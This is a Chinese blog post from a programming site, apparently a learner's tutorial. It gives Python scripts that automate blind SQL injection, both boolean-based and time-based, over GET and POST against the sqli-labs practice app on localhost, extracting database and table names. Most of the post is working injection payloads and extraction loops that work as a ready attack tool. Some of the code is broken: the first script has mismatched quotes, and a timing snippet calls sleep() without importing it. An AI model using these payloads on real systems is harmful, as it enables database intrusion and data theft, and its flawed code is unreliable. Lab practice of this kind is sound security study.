sql注入自动化脚本POST和GET型

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量301 收藏 6
点赞数 3
文章标签: sql 自动化 python web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73728268/article/details/129389788
版权

文章目录

sql注入python自动化脚本

GET型

python脚本自动化注入bool盲注爆数据库名:

import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-5/"
right = "You"
# 注意缩写,python缩写
def database_name():
    name = ''
    for i in range(1,100):
        for j in "abcdefghijklmnopqrstuvwxyz":# 爆flag最好用ascii码,防止漏掉特殊字符
            payload = "?id=1" and substr((select database()),%d,1)='%s'--+"% (i,j) 
            r = requests.get(url + payload)
            if right in r.text:
                name += j
                print(name)
database_name()

python在自动化脚本bool时间盲注爆数据库长度与库名:
关于python时间函数的学习

import datetime
import time
now = datetime.datetime.now() #获取当前的时间
sleep(2)
now1 = datetime.datetime.now() #获取两秒后的时间
sec = (now1-now).seconds
   # sec为2
   # seconds获取的是仅仅是时间差的秒数,忽略微秒数,忽略天数。
   # total_seconds()是获取两个时间之间的总差。
now2 = time.time() #获取当前时间
sleep(2)
now3 = time.time()  # 不能用.seconds,因为这个是float型的

import requests
import time
import datetime
url = "http://127.0.0.1/sqli-labs-master/Less-9/"
def get_database_len():
    for i in range(1,20):
        payload  = "?id=1' and sleep(if(length((select database()))=%d,2,0))--+"% (i)
        start = datetime.datetime.now()
        response = requests.get(url+payload)
        end = datetime.datetime.now()
        tt = (end-start).seconds
        if tt >=2:
            print(i)
            return i
def get_database_name():
    number = get_database_len()
    name = ""
    for i in range(1,number+1): # 这个要加1,不然会少爆出一个字母
        for j in range(32,126):
            payload = "?id=1' and sleep(if(ascii(substr((select database()),%d,1))=%d,2,0))--+"%(i,j)
            start = datetime.datetime.now()
            re = requests.get(url+payload)
            end = datetime.datetime.now()
            ttt = (end - start).seconds # 这个用.seconds使其整数化
            if ttt >=2:
                name += chr(j)
                print(name)
get_database_name()
### 有个缺点,速度太慢,可以进行算法优化

POST

1.延时盲注post型

import datetime
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    for i in range(1,25):
        payload = "admin') and sleep(if(length((select database()))=%d,3,0))#"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        start = time.time()
        html = requests.post(url=url, data=data)
        end = time.time() # 这里好像只能同time.time()
        ttt = end-start
        if ttt >=2:
            print(i)
            return i
def get_name_database():
    number = get_len_database()
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and sleep(if(ascii(substr((select database()),%d,1))=%d,3,0))#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start = time.time()
            # print(data)
            html = requests.post(url=url, data=data) 
            end = time.time()
            ttt = end - start
            # print(ttt)
            if ttt >= 2:
                name += chr(j)
                print(name)
get_name_database()
# 一定要注意payload不要写错不然查错要查特别久

2.bool盲注post型

import requests
import re
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    for i in range(1,25):
        payload = "admin') and length((select database()))=%d #"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        html = requests.post(url=url, data=data)
        if "flag.jpg" in html.text:
            print(i)
            return i
def get_name_database():
    number = get_len_database()
    print(number)
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
                if i == number:
                    return name
                break
def get_name_table():
    name = ""
    result = get_name_database()
    print(result)
    for i in range(1,30):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
get_name_table()
Harder.
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
自动化测试面试题总结.docx
05-07
3,get和post的区别 4,HTTP响应代码 5,osi七层模 6,三次握手过程 7,session和cookie的区别 8,tcp和udp的区别 9,sockect通信原理 10,post的三种请求方式 七、数据库 1,sql分类 2,数据库事务特性:ACID 3,...
Structured-query-Language-injection:SQL注入自动工具
06-15
Structured-query-Language-injection SQL注入自动工具: 多用途 MySQL 注入工具功能 *联合注入 *盲注 *post 和 get 方法注入 ** POST 不工作 *full information_schema enumeration *table and column fuzzer *...
SQL注入入门进阶_报错注入、延时注入、python脚本盲注
菜鸟学安全的博客
01-17 672
本篇文章入门SQL注入,除了回显的SQL注入还存在报错注入、布尔盲注和延时注入。如果sqlmap跑不出来的还可以使用burp intrude注入或者使用python编写脚本注入。
Python自动化sql注入:布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 710
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
2024年Python最全Python自动化sql注入:布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 210
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
sql注入:延时注入python万能脚本
一个努力学习网安的小牛马
11-08 220
【代码】sql注入:延时注入python脚本
SQL盲注之python脚本自动化注入
菜鸟学安全的博客
12-18 1274
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
python sql注入脚本_python打造一个分析网站SQL注入脚本
weixin_39546312的博客
02-09 110
1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站7 url="...
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2902
使用sqlmap进行post注入学习笔记
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 643
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
python学习记录之编写单个post接口自动化(忽略,已重复)
qinian0912的博客
08-19 555
单个post接口自动化
sql注入程序(python2.7+pyqt4.8.5)
03-10
包含程序,还有两个jsp的测试网站(MSSQL、MySQL),程序带有详细的注释。
sql注入测试脚本
03-17
sql注入常用的测试语句大全,方便进行渗透测试和sql注入测试。
Sql2005注射辅助脚本[粗糙版]
12-15
‘欲返回韩文等字符可修改121或者136行,更多的设置要自己修改 ‘更多功能请大家自己加入 Const method = “Get” ‘提交方式请修改此处,有get和post可选 Const DisPlay = “D” ‘S 保存到文件,D输出到...
sqlinator:自动将HTTP GET和POST请求转发到SQLMap的API,以测试SQLi和XSS
05-16
使用mitmproxy拦截所有HTTP通信,并自动将HTTP GET&POST请求转发到SQLMap的API,以测试SQLi和XSS 安装 SQLinator仅支持Python> = 3.6 建议使用pipenv install && pipenv shell SQLinator: pipenv install && ...
WebCruiser V2.6.1
04-27
WebCruiser - Web Vulnerability Scanner for Windows...* 搜索注入延时; * 自动从自带浏览器获取Cookie进行认证; * 自动判断数据库类; * 自动获取关键词; * 多线程; * 高级:代理、敏感词替换/过滤; * 报告;
常见SQL注入手法
weixin_57048716的博客
11-26 1623
1.联合查询 2.伪静态注入 3.宽字节注入 4.报错注入 5.基于布尔盲注 6.基于延时的盲注 7.堆叠注入 8.二次注入
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 496
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
举例几个不存在sql注入的php脚本
06-01
以下是几个不存在SQL注入漏洞的PHP脚本示例: 1. 查询指定用户的信息 ```php <?php // 连接数据库 $conn = mysqli_connect('localhost', 'username', 'password', 'database'); // 获取用户ID $user_id = $_GET['id']; // 预编译 SQL 语句 $stmt = $conn->prepare('SELECT * FROM users WHERE id = ?'); // 绑定参数 $stmt->bind_param('i', $user_id); // 执行查询 $stmt->execute(); // 获取结果 $result = $stmt->get_result(); // 输出结果 while ($row = $result->fetch_assoc()) { echo $row['username'] . '<br>'; echo $row['email'] . '<br>'; } // 关闭连接 $conn->close(); ?> ``` 2. 插入新用户信息 ```php <?php // 连接数据库 $conn = mysqli_connect('localhost', 'username', 'password', 'database'); // 获取用户输入的信息 $username = $_POST['username']; $email = $_POST['email']; $password = $_POST['password']; // 预编译 SQL 语句 $stmt = $conn->prepare('INSERT INTO users (username, email, password) VALUES (?, ?, ?)'); // 绑定参数 $stmt->bind_param('sss', $username, $email, $password); // 执行插入 $stmt->execute(); // 输出结果 echo '新用户添加成功!'; // 关闭连接 $conn->close(); ?> ``` 这两个示例中,都使用了预编译语句和参数绑定,避免了SQL注入漏洞的产生。同时,对于用户输入的数据也进行了过滤和验证,确保数据的正确性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值